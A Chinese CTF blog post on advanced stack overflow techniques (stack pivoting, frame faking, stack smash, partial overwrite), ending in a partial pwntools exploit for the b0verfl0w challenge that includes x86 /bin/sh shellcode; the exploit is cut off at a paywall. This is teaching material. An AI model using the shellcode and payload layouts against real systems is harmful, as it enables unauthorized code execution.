花式栈溢出

最新推荐文章于 2024-03-08 08:33:16 发布
最新推荐文章于 2024-03-08 08:33:16 发布
阅读量846 收藏 1
点赞数
分类专栏: CTF-PWN-栈溢出 文章标签: tcp/ip linux PWN 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_49959202/article/details/120603220
版权
本文详细介绍了栈溢出的各种技术,包括stack pivoting、栈迁移(frame faking)、Stack smash和partial overwrite。文章通过实例解析了这些技术的原理和步骤,涉及利用留下的漏洞控制程序执行流,绕过安全机制如PIE和canary。同时,还提供了多个CTF挑战题的解决方案,展示了如何在实际环境中应用这些技术。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

文章目录

花式栈溢出

参考:https://ctf-wiki.org/pwn/linux/user-mode/stackoverflow/x86/fancy-rop/#2018-over

参考:https://www.yuque.com/hxfqg9/bin/erh0l7

参考:https://ctf-wiki.org/pwn/linux/user-mode/stackoverflow/x86/fancy-rop

1.原理

1.1 stack pivoting

stack pivoting,翻为堆栈旋转 ,该技巧就是劫持栈指针指向攻击者所能控制的内存处,然后再在相应的位置进行 ROP(说白了就是通过控制esp,从而达到间接控制eip的目的)。一般来说,我们可能在以下情况需要使用 stack pivoting:

  • 可以控制的栈溢出的字节数较少,难以构造较长的 ROP 链
  • 开启了 PIE 保护,栈地址未知,我们可以将栈劫持到已知的区域。
  • 其它漏洞难以利用,我们需要进行转换,比如说将栈劫持到堆空间,从而在堆上写 rop 及进行堆漏洞利用

此外,利用 stack pivoting 有以下几个要求

  • 可以控制程序执行流,也就是控制eip。
  • 可以控制 sp 指针。一般来说,控制栈指针会使用 ROP,常见的控制栈指针的 gadgets 一般是
pop rsp/esp
jmp rsp/esp

还有libc_csu_init 中的csu_gadget1 + 3:

pwndbg> x/5i 0x000000000040061A + 3
   0x40061d <__libc_csu_init+93>:       pop    rsp
   0x40061e <__libc_csu_init+94>:       pop    r13
   0x400620 <__libc_csu_init+96>:       pop    r14
   0x400622 <__libc_csu_init+98>:       pop    r15
   0x400624 <__libc_csu_init+100>:      ret

1.2 栈迁移(frame faking)

1.2.1 gadget介绍

栈迁移主要利用了 leave; ret; 这样的gadget

leave相当于:

move esp, ebp;
pop ebp

ret相当于:

pop eip

当程序完成调用,打算返回时,就会出现leave; ret这样的gadget:

1.2.2 栈(payload)布置

栈迁移的栈布置如下(payload = padding + address(fake_ebp1) + read + leave_ret_gadget + 0 + fake_ebp1 + 0x100):

在进行read()函数读入数据时,我们需要输入:address(fake ebp2) + system() + padding _+ “/bin/sh”。(这里以system()为例,也可以调用其他的函数)

备注:

1. payload内加入read是为了在bss段或者data段内写入我们需要的数据,如果需要的数据提前已经被构造好了,那么可以删掉read,直接跟上leave_ret_gagegt。

2.在后面read()读入数据时输入的address(fake ebp2)是为了控制ebp的指向。如果只是为了执行函数,无所谓ebp在哪,那完全不需要输入address(fake ebp2),而可以用padding代替。

1.2.3 步骤分析

我们逐步分析下栈迁移的每一步,以执行system()函数为例:

stage 1:

函数调用完成,程序在函数结尾执行leave指令的move esp, ebp:

stage 2:

执行leave指令的 pop ebp:

stage 3:

程序执行ret,即pop eip,那么调用read(0, fake_ebp1, 0x100)函数。那么我们输入的内容就会从fake_ebp1开始往高地址写,我们让它写入:address(fake ebp2) + system() + padding + “/bin/sh”

stage 4:

程序执行leave_ret_gadget,那么又会像上面一样:

执行move esp, ebp

stage 5:

然后是pop ebp:

这个时候我们发现esp指向了我们写入的函数地址,比如system()函数。

stage 6:

然后是ret:

程序被劫持指向我们指定的函数,比如system(),实现目的。

其他栈迁移方式:

下面再介绍一种栈迁移方式,不过原理基本一样,不一样的是如下的布置方式不需要利用被调用函数的leave;ret 机制,且调用完后ebp不知道会指向哪里(取决于0x804a824内写入的原来的数据),但是仍然可以指向指定的函数:

以下以调用write()函数对栈上的”/bin/sh“进行打印为例:

原栈帧的布置:

0x0000:          b'aaaa' 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'
0x0004:          b'aaaa'
...
0x0064:          b'aaaa'
0x0068:          b'aaaa'
0x006c:          b'aaaa'
0x0070:        0x8048390 read(0, 0x804a828, 100)
0x0074:        0x804836a <adjust @0x84> add esp, 8; pop ebx; ret
0x0078:              0x0 arg0
0x007c:        0x804a828 arg1
0x0080:             0x64 arg2
0x0084:        0x804864b pop ebp; ret  
0x0088:        0x804a824
0x008c:        0x8048465 leave; ret

bss段布置:

0x0000:        0x80483c0 write(1, 0x804a878, 7)
0x0004:        0x804836a <adjust @0x14> add esp, 8; pop ebx; ret
0x0008:              0x1 arg0
0x000c:        0x804a878 arg1
0x0010:              0x7 arg2
0x0014:          b'aaaa' 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'
0x0018:          b'aaaa'
...
0x0048:          b'aaaa'
0x004c:          b'aaaa'
0x0050:          b'/bin' '/bin/sh'
0x0054:           b'/sh'
0x0057:          b'aaaa' 'aaaaaaaaaaaaa'
0x005b:          b'aaaa'
0x005f:          b'aaaa'
0x0063:             b'a'

执行完后,栈帧如下:

1.3 Stack smash

Stack smash是绕过canary保护的技术。

在程序加了 canary 保护之后,如果我们读取的 buffer 覆盖了对应的值时,程序就会报错,而一般来说我们并不会关心报错信息。而 stack smash 技巧则就是利用打印这一信息的程序来得到我们想要的内容。这是因为在程序启动 canary 保护之后,如果发现 canary 被修改的话,程序就会执行 __stack_chk_fail 函数来打印 argv[0] 指针所指向的字符串,正常情况下,这个指针指向了程序名。其代码如下:

void __attribute__ ((noreturn)) __stack_chk_fail (void)
{
   
  __fortify_fail ("stack smashing detected");
}
void __attribute__ ((noreturn)) internal_function __fortify_fail (const char *msg)
{
   
  /* The loop is added only to keep gcc happy.  */
  while (1)
    __libc_message (2, "*** %s ***: %s terminated\n",
                    msg, __libc_argv[0] ?: "<unknown>");
}

所以说如果我们利用栈溢出覆盖 argv[0] 为我们想要输出的字符串的地址,那么在 __fortify_fail 函数中就会输出我们想要的信息。

但是,在我的ubuntu20.04(内核 4.19.128)里面不会打印程序名,也不会打印 <unknown>

*** stack smashing detected ***: terminated

因此,对于比较新的内核,这个技巧无效了。

1.4 partial overwrite

在开启了随机化(ASLR,PIE)后, 无论高位的地址如何变化,低 12 位的页内偏移始终是固定的, 也就是说如果我们能更改低位的偏移, 就可以在一定程度上控制程序的执行流, 绕过 PIE 保护。

2.例题

2.1 stack pivoting

2.1.1 习题信息

习题来自:ctf-challenges/pwn/stackoverflow/stackprivot/X-CTF Quals 2016 - b0verfl0w

2.1.2 程序分析

看一下安全机制:

$ checksec  b0verfl0w
[*] '/mnt/d/study/ctf/资料/ctf-challenges/pwn/stackoverflow/stackprivot/X-CTF Quals 2016 - b0verfl0w/b0verfl0w'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments

可以看出来是32位的,没有canary,没有nx,没有pie,存在RWX

IDA看一下漏洞函数:

signed int vul()
{
   
  char s; // [esp+18h] [ebp-20h]

  puts("\n======================");
  puts("\nWelcome to X-CTF 2016!");
  puts("\n======================");
  puts("What's your name?");
  fflush(stdout);
  fgets(&s, 50, stdin);
  printf("Hello %s.", &s);
  fflush(stdout);
  return 1;
}

程序存在栈溢出,但是溢出的长度为: 50 - 0x20 - 4 = 14字节,因此很多rop无法执行。

考虑stack privoting,因为程序没有开启nx,因此可以把shellcode部署到栈上执行。基本思路如下:

  1. 利用栈溢出部署shellcode
  2. 控制eip指向shellcode

那么如何控制eip指向shellcode,我们寻找类似 jmp esp 的gadget:

$ ROPgadget --binary b0verfl0w --only "jmp|ret"
Gadgets information
============================================================
0x080483ab : jmp 0x8048390
0x080484f2 : jmp 0x8048470
0x08048611 : jmp 0x8048620
0x0804855d : jmp dword ptr [ecx + 0x804a040]
0x08048550 : jmp dword ptr [ecx + 0x804a060]
0x0804876f : jmp dword ptr [ecx]
0x08048504 : jmp esp
0x0804836a : ret
0x0804847e : ret 0xeac1

Unique gadgets found: 9

可以使用 0x08048504 处的gadget,当esp指向了我们可以控制的gadget时,触发jmp esp,从而让eip指向我们可以控制的gadget。然后我们可以控制的gadget功能就是让esp指向栈上shellcode,再jmp esp。

exp如下:

from pwn import *
sh = process('./b0verfl0w')

shellcode_x86 = "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73"
shellcode_x86 += "\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0"
shellcode_x86 += "\x0b\xcd\x80"

sub_esp_jmp = asm('sub esp, 0x28;jmp esp')  # 我们可以控制的gadget
jmp_esp = 0x08048504
payload = shellcode_x86 + (
    0x20 - len(shellcode_x86
最低0.47元/天 解锁文章
花式栈溢出技巧----stack pivoting/frame faking
qq_42192672的博客
10-14 1340
学习文献:https://ctf-wiki.github.io/ctf-wiki/pwn/linux/stackoverflow/basic_rop/                   https://www.jianshu.com/p/c53627895330 1.stack pivoting 转移堆  以 X-CTF Quals 2016 - b0verfl0w 为例学习 #若可溢出...
花式栈溢出技巧之stack pivoting
至臻求学,胸怀云月
02-18 1690
原理 正如它描述的,该技巧就是劫持栈指针指向攻击者所能控制的内存处,然后在相应位置进行ROP。一般来说,我们可能在下述情况使用劫持栈指针。 可以控制栈溢出的字节数较少,难以构造较长的ROP链。 开启了PIE保护,栈地址未知,我们可以将栈劫持到已知的区域。 其他漏洞难以利用,需要进行转换,比如将栈劫持到推空间,从而在堆上写rop及进行堆漏洞利用。 此外,栈指针劫持有以下几个要求: 可以控制程序...
花式栈溢出技巧----partial overwrite
qq_42192672的博客
10-18 1432
学习资料:https://ctf-wiki.github.io/ctf-wiki/pwn/linux/stackoverflow/others/#partial-overwrite                   https://bbs.ichunqiu.com/thread-43627-1-1.html                   https://www.jianshu.com/...
花式栈溢出技巧之frame faking
至臻求学,胸怀云月
02-29 2780
frame faking 构造一个虚假的栈帧来控制程序的执行流 原理 之前所讲的栈溢出不外乎两种方式: 控制程序EIP 控制程序EBP 其最终都是控制程序的执行流。在frame faking中,我们所利用的技巧辨是同时控制EBP和EIP,这样我们在控制程序执行流的同时,也改变程序栈帧的位置。 函数的入口点和出口点 入口点 push ebp #将ebp压栈 mov ebp, esp ...
栈溢出技巧(上)
m0_59598029的博客
08-10 287
我们都知道由于受到堆栈和libc地址可预测的困扰,ASLR被设计出来并得到广泛应用,后来各种绕过技术出现,比如return-to-plt、gotransomize)等的出现,PIE保护应运而生了。一般地都会把地址空间随机化和PIE混为一谈,没有详细地去了解过两者的区别(可能只有我没了解过,大佬们飘过即可),因为先来看一下两者的区别。
花式栈溢出技巧----Stack smash
qq_42192672的博客
10-17 1490
学习文献:https://ctf-wiki.github.io/ctf-wiki/pwn/linux/stackoverflow/others/#stack-smash 以前遇见过一次这种情况,但是是不求甚解的完成了,这次慢慢分析一下原理 栈保护和NX字段都开启了,这里科普一下栈保护,我喜欢叫它金丝雀,链接:https://blog.youkuaiyun.com/qq_42192672/article...
[pwn]ROP:三道题讲解花式绕过Canary栈保护
Breeze的博客
08-26 1万+
文章目录绕过Canary栈保护Canary栈保护babystack writeupMary_Morton writeup 绕过Canary栈保护 Canary栈保护 Canary是一种栈保护手段,通常通过在栈中插入cookie信息(一般在ebp上方),在函数返回的时候检查cookie是否改变,如果改变则认为栈结构被破坏,则调用一个函数强制停止程序。当开启Canary保护的时候不能通过传统的栈溢出直...
pwn】学pwn日记(栈学习)(随缘更新)
woodwhale的博客
08-04 5551
pwn】学pwn日记(持续更新) 前言 从8.2开始系统性学习pwn,在此之前,学习了部分汇编指令以及32位c语言程序的堆栈图及函数调用。 文章中的部分图片来自于教学视频 学习视频链接:XMCVE 2020 CTF Pwn入门课程、【星盟全】PWN系列教程(持续更新) 学习文章链接: CTF Wiki elf文件 未初始化的全局变量glb,编译出来在内存中bss中 初始化的全局变量str(没有被修改过),编译出来在内存中data 而hello world在text段中 main和sum
Linux pwn入门教程(9)——stack canary与绕过的思路
子曰小玖的博客
06-04 2815
https://bbs.ichunqiu.com/thread-44069-1-1.html 0x00 canary简介 我们知道,通常栈溢出的利用方式是通过溢出存在于栈上的局部变量,从而让多出来的数据覆盖ebp、eip等,从而达到劫持控制流的目的。然而stack canary这一技术的应用使得这种利用手段变得难以实现。canary的意思是金丝雀,来源于英国矿井工人用来探查井下气体是否有毒的金...
栈溢出技巧(下)
m0_59598029的博客
08-10 435
canary这个值被称作金丝雀(“canary”)值,指的是矿工曾利用金丝雀来确认是否有气体泄漏,如果金丝雀因为气体泄漏而中毒死亡,可以给矿工预警。在brop中也提到过,通过爆破的办法去进行绕过canary保护,因为canary的值在每次程序运行时都是不同的,所以这需要一定的条件:fork的子进程不变,题目中很难遇到,所以我们可以使用stacksmash的方法进行泄漏内容。
2018 - - babypie [stack partial overwrite]
ACdream
02-13 1441
明显的是缓冲区溢出呀,read函数可以多读 64位程序,开启了NX和PIE,且程序里有了system("/bin/sh") 目标:控制RIP到A3E函数即可~ 首先,要处理canary的问题~然后,覆盖返回地址~ partial overwrite:在开启了PIE后,无论高位地址如何变化,低位地址是不变的,意味着有概率“撞到”正确的地址 exp如下: #!/usr/bin/e...
静态代码检查--Fortify 使用方法
Sean
03-16 7602
假定待检查的插件为”func_demo":(相应makefile文件跟插件相对应) ====================================================== Windows: 清理历史编译 sourceanalyzer -b "func_demo" -clean 执行编译检查 sourceanalyzer -b "func_demo" touch
深入解析glibc中的strcpy和strncpy函数及其全考量
最新发布
极客代码
03-08 1170
在C语言编程中,字符串操作是常见的任务之一。`strcpy`和`strncpy`作为GNU C Library(glibc)提供的两个核心字符串复制函数,在实际开发中扮演了重要角色。然而,它们的全性特性却有所差异,这直接影响到我们是否应当在特定场景下使用这些函数。本文将详细解析glibc中这两个函数的源码实现,并通过实例来阐述为何不建议在某些情况下直接使用`strcpy`。
Linux中的常用内存问题检测工具
热门推荐
世事难料,保持低调
06-27 4万+
C/C++等底层语言在提供强大功能及性能的同时,其灵活的内存访问也带来了各种纠结的问题。如果crash的地方正是内存使用错误的地方,说明你人品好。如果crash的地方内存明显不是consistent的,或者内存管理信息都已被破坏,并且还是随机出现的,那就比较麻烦了。当然,祼看code打log是一个办法,但其效率不是太高,尤其是在运行成本高或重现概率低的情况下。另外,静态检查也是一类方法,有很多工具(lint, cpp
好好说话之Stack smash
hollk’s blog
07-28 2267
Stack smash 我们之前一直没有做过关于canary保护的题,那么这个Stack smash就是绕过canary保护的技术。在程序加载了canary保护之后如果我们是在覆盖缓冲区的时候就会连带着覆盖了canary保护的cookie,这个时候程序就会报错。但是这个技术并不在乎是否报错,而是在乎报错的内容。stack smash技巧就是利用打印这一信息的程序来得到我们想要的内容。这是因为在程序启动canary保护之后,如果发现canary被修改的话就会执__stack_chk_fail函数来打印argv
pwn 月赛unexploit
doudoudedi
10-01 413
直接进入主函数查看 可以供我们溢出的空间很少这里就要涉及到栈迁移了需要用到寄存器ebp,esp指令leave;ret leave==mov esp,ebp;pop ebp ret ==pop eip 我们能控制执行流然后继续跳入read函数因为read的读入位置是和ebp有关的所以可以控制栈的位置 所以我们先将ebp置为bss-0x8 然后跳到read读入的数据会到bss段然后将bss+0x...
栈溢出技巧-
蚁景网安学院
04-02 1245
基于报错类的栈保护canary这个值被称作金丝雀(“canary”)值,指的是矿工曾利用金丝雀来确认是否有气体泄漏,如果金丝雀因为气体泄漏而中毒死亡,可以给矿工预警。在brop中也提到过,...
尝试规避"FORTIFY_SOURCE: FD_SET: file descriptor >= FD_SETSIZE"
ckanhw的博客
12-08 8115
Android 5.0及以上,select调用会检查fd大小,是否超过1024,如果超过就会提示: FORTIFY_SOURCE: FD_SET: file descriptor >= FD_SETSIZE. Calling abort(). 然后崩溃,检查的代码在: /bionic/libc/bionic/__FD_chk.cpp extern "C" int __FD_IS
GCC:堆栈溢出保护
风静如云的博客
07-13 5020
因此在开发阶段最好使用-fstack-protector-all编译选项已便于早期捕捉到堆栈溢出问题。-fstack-protector:启用堆栈保护,不过只为局部变量中含有 char。-fstack-protector-all:启用堆栈保护,为所有函数插入保护代码。-fstack-protector-strong:提供更广泛的堆栈保护。-fno-stack-protector:禁用堆栈保护。已放弃 (核心已转储)的函数插入保护代码。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值